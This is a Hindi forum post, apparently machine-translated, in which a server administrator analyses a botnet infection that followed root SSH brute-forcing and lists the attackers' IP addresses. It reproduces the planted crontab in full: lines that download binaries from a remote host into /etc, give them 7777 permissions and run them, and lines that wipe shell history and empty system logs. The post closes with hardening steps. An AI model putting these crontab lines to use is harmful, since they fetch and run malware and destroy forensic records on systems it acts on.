खैर, जैसा कि अपेक्षित था, और जैसा @ जोएल डेविस ने कहा, सभी लॉग मिटा दिए गए थे, लेकिन @Ramesh ने बताया कि रूट उपयोगकर्ता तक पहुंचने के कुछ प्रयास हैं लेकिन कुछ बार सही पासवर्ड दर्ज करने में विफल रहे, फिर डिस्कनेक्ट के लिए बहुत सारे पुन: प्रयास करता है।
मैंने तीन पतों पर एक ट्रेसरआउट किया और दो चीन के हैं और दूसरे पाकिस्तान के हैं; ये आईपी हैं:
221.120.224.179
116.10.191.218
61.174.51.221
बोटनेट के बारे में अधिक जानकारी जो समझौता किए जाने के बाद सर्वर में इंजेक्ट की गई थी:
हैकर्स कोंटैब को 7 एक्जीक्यूटिव्स को निष्पादित करने के लिए संपादित करते हैं, जो कि प्रत्येक एक्स राशि का उपयोग करते हैं, सभी सीपीयू का उपयोग करते हैं, सर्वर नेटवर्क आउटपुट को अधिकतम करते हैं, फिर बस मर जाते हैं। इसके अलावा, वे जोड़ा लाइनों को छिपाने के लिए 100 बार crontab में रीडमी को जोड़ते हैं, इसलिए जब आप करते crontab -l
हैं तो आप रीडमी द्वारा छिपी हुई लाइनों के साथ स्पैम हो जाएंगे। इसे दरकिनार करने के लिए, मैंने प्रयोग किया crontab -l | grep -v '^#'
और यहाँ उस कमांड का आउटपुट है:
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
जैसा कि आप देख सकते हैं, सभी लॉग फाइलें साफ़ हो जाती हैं, यही कारण है कि मैं बहुत सारी जानकारी प्राप्त नहीं कर पाया था।
इसने पूरे सर्वर (सभी वीएम) को साइटों पर और प्रॉक्सॉक्स पर टाइमआउट कर दिया। यहाँ एक ग्राफ है (स्पाइक्स बॉटनेट को सक्रिय रूप से DDoS'ing दर्शाता है और नेटवर्क को नोटिस करता है):
परिणामस्वरूप मैं सभी कनेक्शनों को अवरुद्ध करने के लिए एक फ़ायरवॉल पर चीनी आईपी पते की पूरी श्रृंखला जोड़ रहा हूं (मेरे पास कोई चीनी उपयोगकर्ता नहीं है इसलिए मुझे परवाह नहीं है), मैं दूरस्थ रूट लॉगिन को भी समाप्त कर दूंगा और लंबे समय तक जटिल का उपयोग करूंगा पासवर्ड। मैं सबसे अधिक संभावना ssh पोर्ट को बदलूंगा और निजी ssh कुंजियों का भी उपयोग करूंगा।